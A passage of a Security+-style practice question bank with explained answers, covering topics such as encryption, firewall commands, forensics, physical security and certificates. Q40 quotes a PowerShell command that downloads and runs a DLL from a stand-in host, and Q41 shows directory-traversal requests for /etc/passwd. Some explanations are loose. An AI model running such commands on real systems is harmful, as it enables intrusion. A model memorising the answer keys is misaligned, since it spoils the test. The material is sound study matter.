c. Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the management team.

Here’s why this option is the most suitable:

Quarterly audits: Regular audits allow the security team to review all user accounts that have been granted exceptions to use USB storage devices. By doing so, they can verify the validity of each exception and ensure that access is still justified based on current needs. This helps in identifying instances where access should be revoked because it is no longer required.

Verification with management: Auditing exceptions with the management team ensures that all access has appropriate supervisory approval and oversight. This step addresses the issue where some users were granted access without following the formal ticketing process but had supervisor approval. It also aligns with audit requirements to maintain proper documentation and oversight of access control decisions.

Let’s briefly review why the other options are less suitable:

a. Create an automated, monthly attestation process that removes access if an employee’s supervisor denies the approval: While automation can streamline processes, it may not capture nuanced decisions or changes in access needs between monthly intervals, potentially disrupting legitimate access.

b. Remove access for all employees and only allow new access to be granted if the employee’s supervisor approves the request: This approach is overly restrictive and could disrupt legitimate business needs, especially for ongoing projects or roles that require USB device usage.

d. Implement a ticketing system that tracks each request and generates reports listing which employees actively use USB storage devices: While a ticketing system is useful for tracking requests, it doesn't directly address the need to periodically review and revoke unnecessary access that was previously granted.

Therefore, c. Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the management team is the most effective strategy to ensure appropriate access control without disrupting legitimate operations while also addressing the issue of unneeded access not being removed promptly.

33
Q

A financial institution would like to store its customer data in a cloud but still allow the data to be accessed and manipulated while encrypted. Doing so would prevent the cloud service provider from being able to decipher the data due to its sensitivity. The financial institution is not concerned about computational overheads and slow speeds. Which of the following cryptographic techniques would BEST meet the requirement?

a. Asymmetric
b. Symmetric
c. Homomorphic
d. Ephemeral

A

c. Homomorphic encryption

Here’s why:

Homomorphic encryption allows computations to be performed on encrypted data without decrypting it first. This means that authorized parties can perform operations (such as addition, multiplication, etc.) on the encrypted data, obtain results in encrypted form, and then decrypt the results to obtain the same outcome as if the operations had been performed on the plaintext data.

For a financial institution storing sensitive customer data in the cloud, homomorphic encryption ensures that the data remains encrypted at all times, even during processing and manipulation. This prevents the cloud service provider (CSP) or any unauthorized parties from accessing or deciphering the sensitive data, thus preserving confidentiality.

While homomorphic encryption can be computationally intensive and may introduce some latency due to its complex operations, these concerns are secondary according to the scenario where computational overheads and slow speeds are not critical issues.

In contrast, let’s briefly review the other options:

a. Asymmetric encryption: In asymmetric encryption, different keys are used for encryption and decryption. It's not typically used for computations on encrypted data but rather for secure communication and digital signatures.

b. Symmetric encryption: Symmetric encryption uses the same key for both encryption and decryption. While efficient for data storage and transmission, it doesn't support computation on encrypted data as required in the scenario.

d. Ephemeral encryption: Ephemeral encryption refers to short-lived keys used for encryption and is not directly related to the ability to perform computations on encrypted data.

Therefore, c. Homomorphic encryption is the most appropriate cryptographic technique to allow the financial institution to store and manipulate customer data in the cloud while maintaining strong security through encryption.

34
Q

A cryptomining company recently deployed a new antivirus application to all of its mining systems. The installation of the antivirus application was tested on many personal devices, and no issues were observed. Once the antivirus application was rolled out to the servers, constant issues were reported. As a result, the company decided to remove the mining software. The antivirus application was MOST likely classifying the software as:

a. a rootkit.
b. a PUP.
c. a backdoor.
d. ransomware.
e. a RAT.

A

b. a PUP (Potentially Unwanted Program)

Here’s why:

Potentially Unwanted Program (PUP): Antivirus applications often flag software as PUPs if they exhibit behaviors or characteristics that are not inherently malicious but may be undesirable or unwanted. Cryptomining software, while not necessarily harmful in intent, can consume significant system resources (CPU, GPU) and may exhibit behavior patterns (like high resource usage) that antivirus software flags as potentially unwanted.

Constant issues reported after antivirus deployment: If the antivirus application was causing issues only after the mining software was deployed to servers (which are typically more critical and sensitive systems than personal devices), it suggests that the antivirus was reacting to the mining software's behavior or characteristics as potentially unwanted.

In contrast, let’s briefly review the other options:

a. a rootkit: Rootkits are malicious software designed to gain unauthorized access and hide the presence of other malicious software or activities. Cryptomining software, while intrusive in resource usage, typically does not operate as a rootkit.

c. a backdoor: A backdoor is a type of malicious software that provides unauthorized access to a system. Cryptomining software, if not maliciously intended, would not function as a backdoor.

d. ransomware: Ransomware encrypts data and demands payment for decryption. Cryptomining software is unrelated to ransomware behavior.

e. a RAT (Remote Access Trojan): RATs are malicious programs that allow remote control of a compromised system. Cryptomining software does not fall into this category unless modified maliciously.

Therefore, b. a PUP (Potentially Unwanted Program) is the most likely classification that the antivirus application applied to the mining software, leading to the reported issues and the decision to remove the mining software from the servers.

35
Q

A cybersecurity administrator is using iptables as an enterprise firewall. The administrator created some rules, but the network now seems to be unresponsive. All connections are being dropped by the firewall. Which of the following would be the BEST option to remove the rules?

a. # iptables -t mangle -X
b. # iptables -F
c. # iptables -Z
d. # iptables -P INPUT -j DROP

A

When faced with a situation where iptables rules are causing the network to become unresponsive by dropping all connections, the BEST option to remove those rules and restore normal network functionality is:

b. # iptables -F

Explanation:

iptables -F: This command flushes (deletes) all the rules from the selected chain (by default, the filter table, which handles INPUT, OUTPUT, and FORWARD chains). Flushing the rules will effectively remove all firewall rules, including any that might be causing the network to drop all connections.

Let’s briefly review the other options for clarity:

a. # iptables -t mangle -X: This command deletes all the non-builtin chains in the mangle table. It's useful for removing user-defined chains in the mangle table, but it does not remove rules from the filter table which is typically used for network filtering.

c. # iptables -Z: This command resets the packet and byte counters in all chains. It does not remove rules; it just clears the counters.

d. # iptables -P INPUT -j DROP: This command sets the default policy for the INPUT chain to DROP, which means all incoming packets are dropped unless explicitly allowed by rules. This doesn't remove rules but changes the default action for incoming packets.

Therefore, b. # iptables -F is the correct and most appropriate option to remove all rules and restore normal network connectivity when iptables rules are causing the network to become unresponsive.

36
Q

An incident response technician collected a mobile device during an investigation. Which of the following should the technician do to maintain chain of custody?

a. Document the collection and require a sign-off when possession changes.
b. Lock the device in a safe or other secure location to prevent theft or alteration.
c. Place the device in a Faraday cage to prevent corruption of the data.
d. Record the collection in a blockchain-protected public ledger.

A

a. Document the collection and require a sign-off when possession changes.

Here’s why this option is correct:

Documenting the collection: This involves recording details such as the date, time, location, condition of the device, and the person who collected it. Documenting ensures a clear record of when and how the device was collected, which is essential for maintaining the chain of custody.

Sign-off when possession changes: Requiring a sign-off ensures accountability and documentation of who has possession of the device at any given time. This helps prevent unauthorized access or tampering with the device during the investigation process.

In contrast, let’s briefly review why the other options are less appropriate:

b. Lock the device in a safe or other secure location to prevent theft or alteration: While securing the device is important, chain of custody involves documenting every instance of possession change and maintaining a record, not just securing the physical location.

c. Place the device in a Faraday cage to prevent corruption of the data: Faraday cages are used to block electromagnetic signals, which is typically done to prevent remote wiping or alteration of data, but it does not address the documentation and accountability aspects of chain of custody.

d. Record the collection in a blockchain-protected public ledger: While blockchain technology can provide immutable records, it is not commonly used for everyday chain of custody purposes in incident response. Documentation and sign-offs are more practical and widely accepted methods.

Therefore, a. Document the collection and require a sign-off when possession changes is the best practice for maintaining chain of custody when collecting a mobile device during an investigation.

37
Q

A company recently implemented a patch management policy; however, vulnerability scanners have still been flagging several hosts, even after the completion of the patch process. Which of the following is the MOST likely cause of the issue?

a. The vendor firmware lacks support.
b. Zero-day vulnerabilities are being discovered.
c. Third-party applications are not being patched.
d. Code development is being outsourced.

A

c. Third-party applications are not being patched.

Here’s why this option is likely:

Third-party applications: While the company may have implemented a patch management policy for its own operating systems and software, third-party applications (such as software from other vendors or providers) often require separate patching processes. These applications can include plugins, libraries, middleware, and other software components that are critical but not directly controlled by the company's internal patch management policy.

Vulnerability scanners: These scanners detect vulnerabilities not only in the company's core operating systems and applications but also in third-party software. If third-party applications are not included in the patch management process or if patches are not applied promptly, vulnerability scanners will continue to flag these hosts as vulnerable.

Let’s briefly review the other options for clarity:

a. The vendor firmware lacks support: While outdated vendor firmware can be a vulnerability issue, it typically affects specific hardware components and is less likely to be the sole reason for vulnerability scanner flags across multiple hosts.

b. Zero-day vulnerabilities are being discovered: Zero-day vulnerabilities are newly discovered vulnerabilities for which no patch or mitigation is available. While serious, they are less likely to be the cause if the issue persists after the completion of a patch management process, as zero-day vulnerabilities are usually not addressed immediately by patches.

d. Code development is being outsourced: Outsourced code development can introduce security risks, but it's not directly related to the ongoing vulnerability scanner flags unless specific vulnerabilities are introduced due to insecure coding practices.

Therefore, c. Third-party applications are not being patched is the most likely cause of the vulnerability scanner flags continuing after the patch management process. Addressing third-party application patching alongside internal systems can help mitigate these ongoing vulnerabilities.

38
Q

Which of the following controls would provide the BEST protection against tailgating?

a. Access control vestibule
b. Closed-circuit television
c. Proximity card reader
d. Faraday cage

A

a. Access control vestibule

Here’s why:

Access control vestibule: Also known as a mantrap or airlock, an access control vestibule is designed to allow only one person to pass through at a time. It typically consists of two sets of interlocking doors. The first set of doors must close and lock before the second set of doors can open, ensuring that only one person can enter or exit at a time. This effectively prevents unauthorized individuals from following closely behind an authorized person (tailgating) without proper authentication.

In contrast, let’s briefly review the other options:

b. Closed-circuit television (CCTV): CCTV provides video surveillance but does not physically prevent tailgating. It can be used to monitor and record incidents of tailgating but does not directly stop unauthorized access.

c. Proximity card reader: While proximity card readers authenticate individuals based on their proximity cards, they do not prevent tailgating by themselves. Tailgating can occur if an unauthorized person closely follows an authorized person through the door before it closes.

d. Faraday cage: A Faraday cage is designed to block electromagnetic signals and is used primarily for preventing electronic eavesdropping or interference. It is not relevant for physical access control against tailgating.

Therefore, a. Access control vestibule is the best control among the options listed to effectively prevent tailgating by enforcing a single-person entry and exit process through secured doors.

39
Q

A penetration tester executes the command crontab -l while working in a Linux server environment. The penetration tester observes the following string in the current user’s list of cron jobs:

*/10 * * * * root /writable/update.sh

Which of the following actions should the penetration tester perform NEXT?

a. Privilege escalation
b. Memory leak
c. Directory traversal
d. Race condition

A

a. Privilege escalation

Here’s why:

Cron job as root: The cron job is configured to execute a script (update.sh) located in a writable directory (/writable/) as the root user. This setup indicates that the script runs with elevated privileges, potentially allowing the penetration tester to execute commands as root.

Objective: By identifying the cron job and its configuration, the penetration tester can now focus on exploiting potential vulnerabilities within the /writable/update.sh script or the writable directory itself to escalate privileges and gain root access.

Let’s briefly review the other options for clarity:

b. Memory leak: A memory leak refers to a situation where a program fails to release memory it has allocated but no longer needs. It is unrelated to the observed cron job configuration.

c. Directory traversal: Directory traversal involves exploiting insufficient security validation in file path inputs to access files outside of the intended directory. It is not directly relevant to the cron job scenario described.

d. Race condition: A race condition occurs when two or more operations are performed concurrently, leading to unexpected outcomes due to the sequence of execution. While it can be a security issue, it is not directly applicable to the cron job observation scenario.

Therefore, a. Privilege escalation is the next logical action for the penetration tester after identifying the root-executed cron job, aiming to exploit it to gain escalated privileges on the Linux server.

40
Q

An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is reverse engineering what the file does and finds that it executes the following script:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundl132.exe $env:TEMP\autoupdate.dll

Which of the following BEST describes what the analyst found?

a. A PowerShell code is performing a DLL injection.
b. A PowerShell code is displaying a picture.
c. A PowerShell code is configuring environmental variables.
d. A PowerShell code is changing Windows Update settings.

A

a. A PowerShell code is performing a DLL injection.

Here’s why this option is the best description:

Script Analysis:
    The script uses PowerShell (powershell.exe) to download a file (04EB18.jpg) from the specified URI (https://somehost.com/).
    It saves the downloaded file as autoupdate.dll in the temporary directory ($env:TEMP).
    After downloading, it executes (Start-Process) rundl132.exe (which appears to be a typo for rundll32.exe, a legitimate Windows executable used for running DLLs as programs) with autoupdate.dll as the argument.

DLL Injection: The script's behavior of downloading a file (autoupdate.dll) and then executing it with rundll32.exe suggests a typical method used in DLL injection attacks. DLL injection involves loading and executing malicious DLLs within the context of another process (in this case, rundll32.exe), potentially compromising system integrity and security.

In contrast, let’s briefly review the other options:

b. A PowerShell code is displaying a picture: While the script mentions downloading a file (04EB18.jpg), it's actually saving it as a DLL (autoupdate.dll) and executing it, not displaying it as an image.

c. A PowerShell code is configuring environmental variables: The script uses $env:TEMP to specify the temporary directory for saving the downloaded file, but it's not primarily focused on configuring environmental variables.

d. A PowerShell code is changing Windows Update settings: There is no indication in the script that it is modifying Windows Update settings. Instead, it is downloading and executing a potentially malicious DLL.

Therefore, a. A PowerShell code is performing a DLL injection accurately describes the actions and intent of the PowerShell script as observed by the security analyst.

41
Q

A security engineer obtained the following output from a threat intelligence source that recently performed an attack on the company’s server:

GET index.php?page=..2f..2f..2f..2f..2f..2f..2f..2f..2fetcefpasswd
GET index.php?page=..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetcefpasswd
GET index.php?page=..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetcefpasswd

Which of the following BEST describes this kind of attack?

a. Directory traversal
b. SQL injection
c. API
d. Request forgery

A

a. Directory traversal

Here’s why this option is the best description:

Directory traversal: This attack attempts to access files or directories outside the web server's root directory by using relative path traversal sequences (..). In the provided URLs, the sequence ..2f represents the character sequence ../, which moves up one directory level in Unix-based systems (as %2f is the URL-encoded form of /).

Attack Pattern: The repeated use of ..2f in the page parameter (index.php?page=..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetcefpasswd) suggests an attempt to navigate several directory levels above the web server's root directory (/etcefpasswd). The attacker aims to access sensitive files or directories that are not intended to be publicly accessible.

In contrast, let’s briefly review the other options for clarity:

b. SQL injection: SQL injection involves manipulating SQL queries through input data, typically through forms or parameters, to execute unauthorized SQL commands. The provided URLs do not show typical SQL injection patterns.

c. API: APIs (Application Programming Interfaces) allow applications to communicate and interact with each other. The attack described does not involve API-related activities.

d. Request forgery: Request forgery involves tricking a user into performing actions without their knowledge or consent, often through maliciously crafted requests. This is not evident from the provided output, which focuses on repeated directory traversal attempts.

Therefore, a. Directory traversal is the best description of the attack based on the provided information, where the attacker is trying to navigate through directories beyond the web server’s intended access boundaries.

42
Q

An organization’s Chief Information Security Officer is creating a position that will be responsible for implementing technical controls to protect data, including ensuring backups are properly maintained. Which of the following roles would MOST likely include these responsibilities?

a. Data protection officer
b. Data owner
c. Backup administrator
d. Data custodian
e. Internal auditor

A

d. Data custodian

Here’s why:

Data custodian: A data custodian is responsible for the storage, maintenance, and protection of data assets within an organization. This role involves implementing technical controls, such as backup procedures and data encryption, to ensure data integrity, availability, and confidentiality. Ensuring backups are properly maintained falls directly within the purview of a data custodian's responsibilities.

In contrast, let’s briefly review the other options for clarity:

a. Data protection officer: The Data Protection Officer (DPO) is typically responsible for overseeing an organization's data protection strategy and ensuring compliance with data protection regulations such as GDPR. While they have oversight, they may not directly implement technical controls like backups.

b. Data owner: The data owner is responsible for the governance of specific data elements, making decisions regarding access, usage, and overall data strategy. They are typically not involved in technical implementation such as backup management.

c. Backup administrator: While responsible for backups, a backup administrator's role is more focused on the operational aspects of backup systems and schedules rather than broader data protection and technical control implementation.

e. Internal auditor: Internal auditors review and assess an organization's processes and controls for compliance and efficiency but do not typically have responsibility for implementing day-to-day technical controls like data backups.

Therefore, d. Data custodian is the role that would typically encompass responsibilities for implementing technical controls to protect data and ensuring proper maintenance of backups within an organization.

43
Q

Which of the following BEST describes the team that acts as a referee during a penetration-testing exercise?

a. White team
b. Purple team
c. Green team
d. Blue team
e. Red team

A

a. White team

▪ Red Team - The hostile or attacking team in a penetration test or incident
response exercise
▪ Blue Team - The defensive team in a penetration test or incident response
exercise
▪ White Team - Staff administering, evaluating, and supervising a penetration test
or incident response exercise

44
Q

Which of the following would MOST likely be identified by a credentialed scan but would be missed by an uncredentialed scan?

a. Vulnerabilities with a CVSS score greater than 6.9.
b. Critical infrastructure vulnerabilities on non-IP protocols.
c. CVEs related to non-Microsoft systems such as printers and switches.
d. Missing patches for third-party software on Windows workstations and servers.

A

d. Missing patches for third-party software on Windows workstations and servers.

Here’s why:

Credentialed vs. uncredentialed scans: Credentialed scans have access to the credentials (such as usernames and passwords) of the systems being scanned. This allows the scanning tool to perform a more thorough inspection of the system, including checking for missing patches and updates on both operating system components and third-party software applications installed on the systems.

Missing patches for third-party software: Uncredentialed scans typically only check the network-facing services and ports, identifying vulnerabilities based on responses to network probes. They may miss vulnerabilities related to third-party software applications installed on the systems because they do not have the necessary access to inspect these applications and their patch levels.

In contrast, let’s briefly review the other options for clarity:

a. Vulnerabilities with a CVSS score greater than 6.9: Both credentialed and uncredentialed scans can detect vulnerabilities based on their CVSS scores, regardless of whether they exceed a specific threshold. However, the ability to detect specific missing patches for third-party software is more dependent on the credentials used in the scan.

b. Critical infrastructure vulnerabilities on non-IP protocols: Credentialed scans primarily focus on system-level vulnerabilities and may not specifically target critical infrastructure or non-IP protocols unless those protocols are directly accessible and part of the scan scope.

c. CVEs related to non-Microsoft systems such as printers and switches: Credentialed scans can detect CVEs (Common Vulnerabilities and Exposures) related to non-Microsoft systems if those systems are included in the scan scope and credentials are provided. However, the focus of this question is more on the detection of missing patches for third-party software.

Therefore, d. Missing patches for third-party software on Windows workstations and servers is the most likely scenario where a credentialed scan would provide more comprehensive results compared to an uncredentialed scan.

45
Q

A security administrator is seeking a solution to prevent unauthorized access to the internal network. Which of the following security solutions should the administrator choose?

a. MAC filtering
b. Anti-malware
c. Translation gateway
d. VPN

A

d. VPN (Virtual Private Network)

Here’s why:

VPN: A VPN allows remote users or devices to securely connect to the internal network over the internet. It establishes an encrypted tunnel between the user's device and the internal network, ensuring that data transmitted over the internet is secure and private. VPNs typically require authentication, such as username/password or certificate-based authentication, ensuring that only authorized users or devices can access the internal network.

In contrast, let’s briefly review the other options for clarity:

a. MAC filtering: MAC filtering involves allowing or denying network access based on the MAC (Media Access Control) address of a device. While it can restrict access to some extent, MAC addresses can be spoofed, and it does not provide robust security against determined attackers or unauthorized users.

b. Anti-malware: Anti-malware software protects devices from malicious software such as viruses, trojans, and worms. While important for endpoint security, it does not directly prevent unauthorized access to the internal network.

c. Translation gateway: This term is less commonly used in standard network security contexts. If it refers to a specific type of network gateway, it would need more context, but typically, it doesn't directly prevent unauthorized access like a VPN does.

Therefore, d. VPN is the most appropriate solution for ensuring secure and authenticated remote access to the internal network, preventing unauthorized access effectively.

46
Q

A host was infected with malware. During the incident response, Joe, a user, reported that he did not receive any emails with links, but he had been browsing the internet all day. Which of the following would MOST likely show where the malware originated?

a. The DNS logs
b. The web server logs
c. The SIP traffic logs
d. The SNMP logs

A

a. The DNS logs

DNS logs can show the domain names that Joe’s computer resolved during his browsing session. This can help identify any suspicious or malicious domains that were accessed, which could have been the source of the malware.

Here’s why the other options are less relevant in this context:

The web server logs: These logs are maintained by the web servers Joe visited and would not be available on Joe's machine or the organization's network logs. They also do not provide a comprehensive list of all sites visited by Joe.

The SIP traffic logs: SIP (Session Initiation Protocol) traffic logs are related to VoIP (Voice over IP) and are not relevant to web browsing activity.

The SNMP logs: SNMP (Simple Network Management Protocol) logs are used for network management and monitoring and do not provide information about web browsing activity.

Therefore, the DNS logs would most likely show where the malware originated by identifying the domains Joe’s computer accessed while browsing the internet.

47
Q

A third party asked a user to share a public key for secure communication. Which of the following file formats should the user choose to share the key?

a. .pfx
b. .csr
c. .pvk
d. .cer

A

d. .cer

Here’s why:

.cer (Certificate): A .cer file typically contains a public key and is often used for sharing certificates, including public keys issued by a Certificate Authority (CA). It can be shared securely as it only contains the public key information, which is intended to be publicly accessible.

Let’s briefly review the other options for clarity:

a. .pfx (Personal Information Exchange): A .pfx file contains both the public and private key pair along with any associated certificates. It is used for securely transferring certificates and private keys, but it includes sensitive information and is not suitable for sharing only the public key.

b. .csr (Certificate Signing Request): A .csr file is used to request a certificate from a Certificate Authority (CA) and contains information about the applicant and the public key. It is not used for sharing a public key directly.

c. .pvk (Private Key): A .pvk file contains a private key and is used for securely storing and transferring private keys. It is not appropriate for sharing a public key as it contains sensitive information.

Therefore, d. .cer is the correct file format to choose when sharing a public key for secure communication with a third party.

48
Q

A security administrator is working on a solution to protect passwords stored in a database against rainbow table attacks. Which of the following should the administrator consider?

a. Hashing
b. Salting
c. Lightweight cryptography
d. Steganography

A

b. Salting

Here’s why salting is the appropriate choice:

Salting: Salting involves adding a unique, random value (salt) to each password before hashing it. This salt value ensures that even if two users have the same password, their hashed passwords will be different because of the unique salt. Salting prevents attackers from precomputing hashes (as in rainbow tables) for common passwords across all users, as each user's salt modifies the resulting hash uniquely.

Let’s briefly review the other options for clarity:

a. Hashing: Hashing converts plaintext passwords into a fixed-size string of characters using a cryptographic hash function. While hashing is essential for storing passwords securely, it alone does not prevent rainbow table attacks without the addition of unique salts.

c. Lightweight cryptography: This term generally refers to cryptographic algorithms designed for resource-constrained environments. While important for efficiency in certain contexts, it does not specifically address rainbow table attacks on stored passwords.

d. Steganography: Steganography involves hiding information within other non-secret data. It is not relevant for protecting passwords in a database against rainbow table attacks.
49
Q

A company wants to deploy PKI on its internet-facing website. The applications that are currently deployed are:

*www.company.com (main website)
*contactus.company.com (for locating a nearby location)
*quotes.company.com (for requesting a price quote)

The company wants to purchase one SSL certificate that will work for all the existing applications and any future applications that follow the same naming conventions, such as store.company.com. Which of the following certificate types would BEST meet the requirements?

a. SAN
b. Wildcard
c. Extended validation
d. Self-signed

A

b. Wildcard certificate.

Here’s why:

Wildcard Certificate: A wildcard certificate is designed to secure a domain and all its subdomains. In this case, a wildcard certificate for *.company.com would secure www.company.com, contactus.company.com, quotes.company.com, and any future subdomains like store.company.com. This is particularly useful when you have multiple subdomains under the same domain (company.com in this case) and want a single certificate to cover them all.

SAN (Subject Alternative Name) Certificate: While SAN certificates can also cover multiple domain names (including different domains altogether), they require listing each domain explicitly in the certificate. This can become cumbersome if many subdomains are involved, unlike a wildcard certificate which covers all subdomains automatically.

Extended Validation (EV) Certificate: EV certificates provide higher validation standards but do not inherently cover multiple subdomains or wildcard domains. They focus more on verifying the legitimacy and identity of the organization behind the domain, rather than the number of subdomains covered.

Self-signed Certificate: Self-signed certificates are not suitable for internet-facing websites as they are not trusted by default by browsers and would trigger security warnings for users.

Therefore, for the company wanting to secure company.com and all its subdomains (current and future), a wildcard certificate (*.company.com) is the most appropriate choice among the options provided.

50
Q

A security analyst is concerned about traffic initiated to the dark web from the corporate LAN. Which of the following networks should the analyst monitor?

a. SFTP
b. AIS
c. Tor
d. IoC

A

c. Tor.

Tor (The Onion Router): Tor is a network protocol used for anonymous communication over the internet. It is commonly associated with accessing the dark web, which consists of websites and services not indexed by traditional search engines and often used for illicit purposes.

Here’s why the other options are not correct:

SFTP (Secure File Transfer Protocol): SFTP is a secure protocol used for transferring files securely over a network. It is not directly related to accessing the dark web.

AIS (Automated Information System): AIS typically refers to systems that collect, process, store, display, and disseminate information in an automated manner. It does not relate to accessing the dark web.

IoC (Indicators of Compromise): IoC refers to evidence that a system has been breached or compromised. It involves monitoring for signs of security breaches rather than specific network traffic related to accessing the dark web.

Therefore, the correct network that the security analyst should monitor for concerns related to traffic initiated to the dark web from the corporate LAN is c. Tor. This involves identifying and potentially monitoring Tor network traffic to detect any unauthorized or suspicious activities related to accessing the dark web from within the corporate network.